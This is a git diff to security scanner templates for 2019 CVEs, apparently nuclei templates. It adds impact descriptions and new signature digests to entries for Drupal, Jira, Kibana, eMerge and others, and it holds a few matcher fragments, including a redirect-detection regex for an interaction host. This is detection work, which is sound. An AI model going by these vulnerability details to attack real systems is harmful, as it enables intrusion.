-# digest: 490a00463044022049186b475c0ae9e533411e156ab7bc038fd09dfa2664c7e906684b479502b2580220799dac7845a586cae9dadd64b3aee08a6644367812d1647e5d6d72f9d2769cca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c6370399d16b60b21ae138227dcb3d31b34d25ed93e3882e2306daa5046c315c0221008b1501ecf5f86523ee81dd2aafbd3de28a9784d2978eb0304a266d8d4b66a18d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml
index 92eea7e7a1..eead723ef8 100644
--- a/http/cves/2019/CVE-2019-5434.yaml
+++ b/http/cves/2019/CVE-2019-5434.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Revive Adserver 4.2 is susceptible to remote code execution. An attacker can send a crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. This can be exploited to perform various types of attacks, e.g. serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third-party websites.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of Revive Adserver.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220309b9e2d8add5503833d5b6547f765230f3acb55e4269e80ecf190cb111d61a902207fd16c66327d2a1f853b4fc50581a965720b4292c73dea2c7b7447ce649660f7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a9d106721c4cadfcc6bc9dc34225d4b9845ab7b7f5e2bbd1e70ad85043f8bcd8022033c8040e948d4d305a97ffefcd6c83a0853aaaeb746435353ba39712e4d92664:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml
index 9eda5f023d..26cd563699 100644
--- a/http/cves/2019/CVE-2019-6112.yaml
+++ b/http/cves/2019/CVE-2019-6112.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: medium
   description: WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of WordPress Sell Media or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a7913fbe3fb71667d72ff5e0dd98f199d9f6675ff1dcb72939faa635d320f7350220799beef9cb45e356ddcc2cd228723af11701f61df49b67e45b2dc85bb14036c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008c4db7d7c65d912c994092f7040ac6a713397c1d45d89b664619458c4bebae60022056cbd7385832d88136c72480599adf3c4aee4f573ec450a2695cdd3190ed738f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml
index 291148a5b2..23898ef4ca 100644
--- a/http/cves/2019/CVE-2019-6340.yaml
+++ b/http/cves/2019/CVE-2019-6340.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: high
   description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Drupal site.
   remediation: |
     Apply the official security patch provided by Drupal to fix the deserialization vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ba77ef674bff3c1261e0151b9b7b976392a4d938b38d2ffcc8c6cf95e2ff37ec022100859023e38140d7f410713cf878889a9aa627a4c2b87562942a47b226c2975523:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204b6580494f06ae42e2be9b506757886ac812f37164b066453103dc640364ac2c022029f5c4eb862c9a6312ff3d4f47d19ed171a9215697dcdb3deb821ca95c87040c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml
index acb6dad665..c841ec4d2a 100644
--- a/http/cves/2019/CVE-2019-6715.yaml
+++ b/http/cves/2019/CVE-2019-6715.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.
+  impact: |
+    An unauthenticated attacker can read sensitive files or traverse directories on the target system, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Update to the latest version of W3 Total Cache plugin (0.9.3 or higher) to mitigate the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
         part: body
         words:
           - TmVzc3VzQ29kZUV4ZWNUZXN0
-# digest: 4b0a00483046022100a4281759915d5bb4e1489719ca72ee21ff3ee46cbcece76706bdae03dd35f282022100fcf89a3fede294db6f64150ef34bd56daa71fe9a7dae302e7a0ba4283712a4dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d02a08969548825b0a45584495a2ddbac63d8efcfa4653772aa621a345a8d45c022100abd0c28de31df4660790a8b86bfac5a51a724e014a0ac675e03206b62d6d8de7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml
index 7dbc76c1a0..fc5ef89be7 100644
--- a/http/cves/2019/CVE-2019-6799.yaml
+++ b/http/cves/2019/CVE-2019-6799.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
   remediation: |
     Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability.
   reference:
@@ -101,4 +103,4 @@ http:
           - "X-Powered-By: PHP/([0-9.]+)"
         internal: true
         part: header
-# digest: 4b0a00483046022100d17d89d0e0f3ff6025bf49ba8db203462799352435e85ab4cd7219de8db1b001022100f0de31513606c86e121dbe53bb78603e42a32383acce8fcf0480b647c96be13b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210084d5c7d91ec9241648992700a53b930124cf470193658f85f5719882ef92d058022063d813474e656f26f251b216255562d700a4911b5eaf8f05eec4faeb3cc1d510:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml
index 408d6b19c0..d6b0bbcb92 100644
--- a/http/cves/2019/CVE-2019-7192.yaml
+++ b/http/cves/2019/CVE-2019-7192.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
   remediation: |
     Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station.
   reference:
@@ -82,4 +84,4 @@ http:
         regex:
           - encodeURIComponent\('([A-Za-z0-9]+)'\)
         internal: true
-# digest: 4b0a00483046022100fee07a278bc5372ae51c282d88317b857bce5665d33ed2dfc1ebc573b8509e50022100de1696e282812f556cac4038e4420c15a7c08a18906bd96de9c2127f0d136c6f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c9fcd36d0cb9481ef32d5dbbb1bc1ed907e4d6d9047bb97c9f5a6cad9e6af4b9022050e3f919a77da805394b394b05abceab03e22af0f4b32e37ea108da81fa59d8a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml
index b7d244dc5e..223913b5c5 100644
--- a/http/cves/2019/CVE-2019-7219.yaml
+++ b/http/cves/2019/CVE-2019-7219.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
   reference:
     - https://github.com/verifysecurity/CVE-2019-7219
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100924e4088218d887f5367dcad9b787d44954513565ee8b4e5e9f4bd5feb50bfb602205a8a163197c367c3df8aabbcf8e2cf9071fdd17cc5a058e1b3835e26815f2995:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022037d9ddc6fc0ce33087413e64c147f74f5616135651355992d575e40a290d91a102210099222dbf1147758dd4c1a508d6d08cfd8c4404e9eec77829a7fa44e8cb981a80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml
index fffb169fdc..bf14a4bb38 100644
--- a/http/cves/2019/CVE-2019-7238.yaml
+++ b/http/cves/2019/CVE-2019-7238.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade Sonatype Nexus Repository Manager to a version higher than 3.15.0.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220560c59ae460339611d64d62f6a1c53f43a7bd908ba7f12053def063ee7b4bc490221009ede031649098bc49f82923ad45686a1567ba7cc6e1f89cad54aa5f69d0368c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210092928f587db57aebbabf71d0a6c685acf9a48344c0eb090a54558fe705fb565b0220028675a42b259a8aba6c9a0c1dea9006ee165f491cd15bfb57ceecae7391a21c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml
index 1f2b402d69..ad2a4b4cd4 100644
--- a/http/cves/2019/CVE-2019-7254.yaml
+++ b/http/cves/2019/CVE-2019-7254.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Linear eMerge E3-Series devices are vulnerable to local file inclusion.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
   remediation: |
     Apply the latest security patch or update to a non-vulnerable version of eMerge E3.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100cb4182081bc79b695da75444aefb20e4f560667e6cb9d1b0b5a302e9277ea9a7022100ad29a2c430144f9c1f0d83924c96421eac673669bf4839491777a4e83e1c9f85:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009e9b119e3e497eca16103756534e4766167f1ae75859988b4d73bfa08d10c49702204687227018ee1644ca5aa43b15b0c6661788dc563ba7138f3ecb3fc1a2a350b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml
index 0ae82438b0..118d50779e 100644
--- a/http/cves/2019/CVE-2019-7255.yaml
+++ b/http/cves/2019/CVE-2019-7255.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c96c931e81e4da40d8505f2be9d15b009b42f9091f6152e5de1f9968ab3b3bf502210093edfe42633e14baa20cc53936fe2d1fb743593a0bf60afe38e341b741860b0e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201ce6f14f0b9966f58bd91192da6aacf0d52e4ff9641e3bc440322fc5fc111e5d02210092613cdb190a66c8134d5265385afa85270cc0770f01e1fc6bbd0b9c29cd3192:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml
index 68c01bf8a9..9267571d98 100644
--- a/http/cves/2019/CVE-2019-7256.yaml
+++ b/http/cves/2019/CVE-2019-7256.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patch or update to a non-vulnerable version of eMerge E3.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008151925ede1de0a5754d025154c903ee1a959da98fdf056a12b3b453711fc7ba0221009f39465803c636397bfe9076775890285c74624e4968087fa809dd7dd57c53c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e641270194c8d005550f85f721cc5f36f56d99d98d0d3093786d7e9c307b78af022100c53fdac1bcf6659d796abbe1eca0120a3a955aa39ccd8050e25cb84a73c313d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7275.yaml b/http/cves/2019/CVE-2019-7275.yaml
index 931232b28a..dc37e9a27d 100644
--- a/http/cves/2019/CVE-2019-7275.yaml
+++ b/http/cves/2019/CVE-2019-7275.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Optergy Proton/Enterprise Building Management System contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: |
     Apply the latest security patches or updates provided by Optergy to fix the open redirect vulnerability.
   reference:
@@ -37,4 +39,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4b0a004830460221009bca84c1d42a780b429bbe55ffb78a3ccff61c523ff3c0eb1733e59e710bc6a5022100f85d309b2e534dc1078854bfb4dc685913ecab7dba20a2f6f849f48d0776996c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220374610360ed1efce5c461c2bd37a57eaabbea58ffc0b58ebd6d13c381b7f1d62022100b14a39d925f029276816cc8bc0f307e9eef754341852b66a113f98bab68dfaea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml
index 0fd0894fb5..1043e24ebf 100644
--- a/http/cves/2019/CVE-2019-7315.yaml
+++ b/http/cves/2019/CVE-2019-7315.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the system.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the local file inclusion vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210087ff82b3c4363128b71f79e458195a01e7e0c1b176dc2fcf23efbacc8f92327b02207ba8e121b892097838ece45c1f9fc83564826ce514e6a253f0e07a107d909256:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c1944a7883b372051dfab89d12d5ccc64f7f0b4dfccbb523aa3f048190b0c85402202c4912586cdc29a5d8b0605ad501bd1c36b11fc3ef26c991e048734d9897e899:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml
index 957f11a961..8ab0994c25 100644
--- a/http/cves/2019/CVE-2019-7481.yaml
+++ b/http/cves/2019/CVE-2019-7481.yaml
@@ -5,6 +5,8 @@ info:
   author: _darrenmartyn
   severity: high
   description: The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service.
   remediation: |
     Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
         part: body
         words:
           - "4220397236"
-# digest: 490a00463044021f287062de6e4c22a1d3eff0ed0c0aa4e6aa1bbce83197fe784f070527fc3080022100ece643695a885c2d3bf8b44c6958cbf70d4011402f442e7ca7f8d740be43c2ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100938634ada011c2675a1b1cb8a2cd165c9838c6488928e284f5bc0de98adc14c3022100f0754c051e3b5da2822a2dbee7428cd46384746cd20dcf657d417c4ff36fea63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7543.yaml b/http/cves/2019/CVE-2019-7543.yaml
index 1375469311..fffd323f93 100644
--- a/http/cves/2019/CVE-2019-7543.yaml
+++ b/http/cves/2019/CVE-2019-7543.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of KindEditor or apply the necessary security patches provided by the vendor.
   reference:
@@ -46,4 +48,4 @@ http:
         part: header
         words:
           - text/html
-# digest: 490a0046304402207f2ce61b3cd6d109f371b0fe9153b03313464245cd8e063c66e89c673720b27a022024d913d1061180afc3ea07cc5dc8f841aaac86f9885d7a46fe9bc3eef0d3ad80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022078f867baa8842a06e048a4b2fb76b2690615b41c28ede6e3940edcc69af8c16a02203abc4bc69654d4cb513dd7d126c5702d3629841c1c2e4e776d2ce04761531a13:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml
index ac8056be23..aafa673393 100644
--- a/http/cves/2019/CVE-2019-7609.yaml
+++ b/http/cves/2019/CVE-2019-7609.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
+  impact: |
+    Arbitrary code execution can result in unauthorized access, data leakage, and system compromise.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Kibana to mitigate the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220448323d7a322496618528f233e60992af3bf4d5644b4d79964a2f2a2885ddfa20220274cbaf9aeaefe7b7cebc7e2f0916ac351b68323d76eaab65d4d6e6103d4a47a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bc46906281beacd7864ae3261e8f1d6e6250c4d6ea1c7012c4c12537d43ba17e02207c3e4af3a34e5467b1688841a5f73ec68a81c9beabfed7be02f4b03d56200514:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml
index 6678f0ec4e..b3c27e800b 100644
--- a/http/cves/2019/CVE-2019-8086.yaml
+++ b/http/cves/2019/CVE-2019-8086.yaml
@@ -5,6 +5,8 @@ info:
   author: DhiyaneshDk
   severity: high
   description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution.
   remediation: |
     Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks.
   reference:
@@ -64,4 +66,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c8210845c829d7f7c4a9ef3ccf0680baee4be9159a14958d90c247488416889702204956a101e0144b4ae5815cb3d14c190a273e2890c0394e0bcd59ff21f20aaade:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b7baf75be00ce5150a9fcb0f35a8f5bff4681912835fd9860875618a73405e93022100fc0586e12059e055bd751fb4f8faab79597fc04a5324ade4ed90eaca94489325:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml
index 57cd00699e..23ed48683d 100644
--- a/http/cves/2019/CVE-2019-8390.yaml
+++ b/http/cves/2019/CVE-2019-8390.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor.
   reference:
@@ -73,4 +75,4 @@ http:
           - 'name="login\[_csrf_token\]" value="(.*?)"'
         internal: true
         part: body
-# digest: 490a00463044022010874d352aec5f89109835bc9a44b81fd3b1527e288c27a1477530c5be0007f202200326f689a4dc39944a3363e8b42abc315ac1fab616a077517430a6438272d01f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220319ddc01421d560a611845b75f4fec2f5f6aeb8b3fdb100539e7dbb3c814908f02204f8ba6683a6267f7d3ebd53b6ca5f9474e0f712743f8205590d0951ae8a38931:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml
index ed4d0848a8..e9348f38c9 100644
--- a/http/cves/2019/CVE-2019-8442.yaml
+++ b/http/cves/2019/CVE-2019-8442.yaml
@@ -5,6 +5,8 @@ info:
   author: Kishore Krishna (siLLyDaddy)
   severity: high
   description: Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion.
+  impact: |
+    This vulnerability can result in sensitive information exposure, unauthorized access to files, and potential compromise of the Jira application.
   remediation: |
     Apply the latest security patches or updates provided by Atlassian to mitigate the vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c015b5c3428260bce4661ff4c063d8178160b75ec373de39672526e89407d19d0220647bdccd98cefb27ac917cd09c11097cb5f5b26df068db4ea6081be8e8fc603a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201e85763cb75545525af48ae54aab4248b519260da9c566a7349cc0fb6605ce1502206d5543b1bdea6d2ad2616c6720d5e799bb1cd8985f55637120c48e26a17f1d52:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml
index c431df57e2..537b611345 100644
--- a/http/cves/2019/CVE-2019-8446.yaml
+++ b/http/cves/2019/CVE-2019-8446.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.
+  impact: |
+    This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Jira application.
   remediation: |
     Apply the latest security patches and updates provided by Atlassian to fix the vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022066d91f449d2a6bbf98c0114cb3674d6b6e0c5e33a5febd6ab7e8a7c9ed4645ec022100e1c5b8cef8bebcb2b845bd71b5c3d7d980fd5e0bf42aaab51a98179c76b6c70a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009f2103e3136cd88fcdab42bc32cc95c2d1f375f3fd4a003023f7c3a3725adddc022045f4fd1fd32e9164f30adb0285dbd3a84746fc9b1b4d08222d1796dc572ded2a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml
index 0713745db8..999265ae02 100644
--- a/http/cves/2019/CVE-2019-8449.yaml
+++ b/http/cves/2019/CVE-2019-8449.yaml
@@ -5,6 +5,8 @@ info:
   author: harshbothra_
   severity: medium
   description: Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information.
   remediation: |
     Upgrade Jira to version 8.4.0 or later to fix the information disclosure vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100cb2a31fda4c36bc147d02fd3df8205d4fd357e35a6b229e8658c411df68e3349022100a90285c8f869a0fe460720dee71cb90e3876ff83ec9f75f86e8d43af82a0751f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008c3e13543524a81d0faef816767fa304815e6349aede5cab5d73cb3b91a67a62022043f7c51ed41be8a7021c0728351958c08fed1ea915fa541cdd2fd3489d385977:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml
index 1b88bdf69a..1359fa24b8 100644
--- a/http/cves/2019/CVE-2019-8451.yaml
+++ b/http/cves/2019/CVE-2019-8451.yaml
@@ -5,6 +5,8 @@ info:
   author: TechbrunchFR
   severity: medium
   description: Jira before 8.4.0 is susceptible to server-side request forgery. The /plugins/servlet/gadgets/makeRequest resource contains a logic bug in the JiraWhitelist class, which can allow an attacker to access the content of internal network resources and thus modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
   remediation: |
     Upgrade Jira to version 8.4.0 or later to mitigate the SSRF vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
         part: interactsh_protocol
         words:
           - "http" # Confirms the HTTP Interaction
-# digest: 490a0046304402206c532d768ca49afb0d6564a3d6fa9c7f925b11f0cc888732bfb51d7172fccd7f02203413e30c8d551fc0dca000dc9a3d311ef6b97e2fbfe3f3e6ef476ad4087e7777:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205b163ae76ad5bc15f860b39041eb456e0a1ac0ebb32bda88155904af95623a69022100ec24bd249d29a575cf97575cf620e273fdcf4e662400a0eb661ffb47768e0157:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml
index 3ae6a2bcbd..e70a27a5a3 100644
--- a/http/cves/2019/CVE-2019-8903.yaml
+++ b/http/cves/2019/CVE-2019-8903.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: high
   description: Total.js Platform before 3.2.3 is vulnerable to local file inclusion.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
   remediation: |
     Upgrade Totaljs to version 3.2.3 or later to fix the LFI vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022053492bce235029319aecbb59be6282081d660c7b6ddc2b572921fc1d5fa2ea0b022036381b3a1f697d893cbdb82bce773d72d0968e191063a7da3ba5635189412eca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cde8a7c40a264d3bb735abcd6795fc26e6a21e5c9399aaeafba0e43dd5a85b3502201d0b0cd73908e07f7d20aed884de81385034bb7ce6e786e979b393126564d1b8:922c64590222798bb761d5b6d8e72950
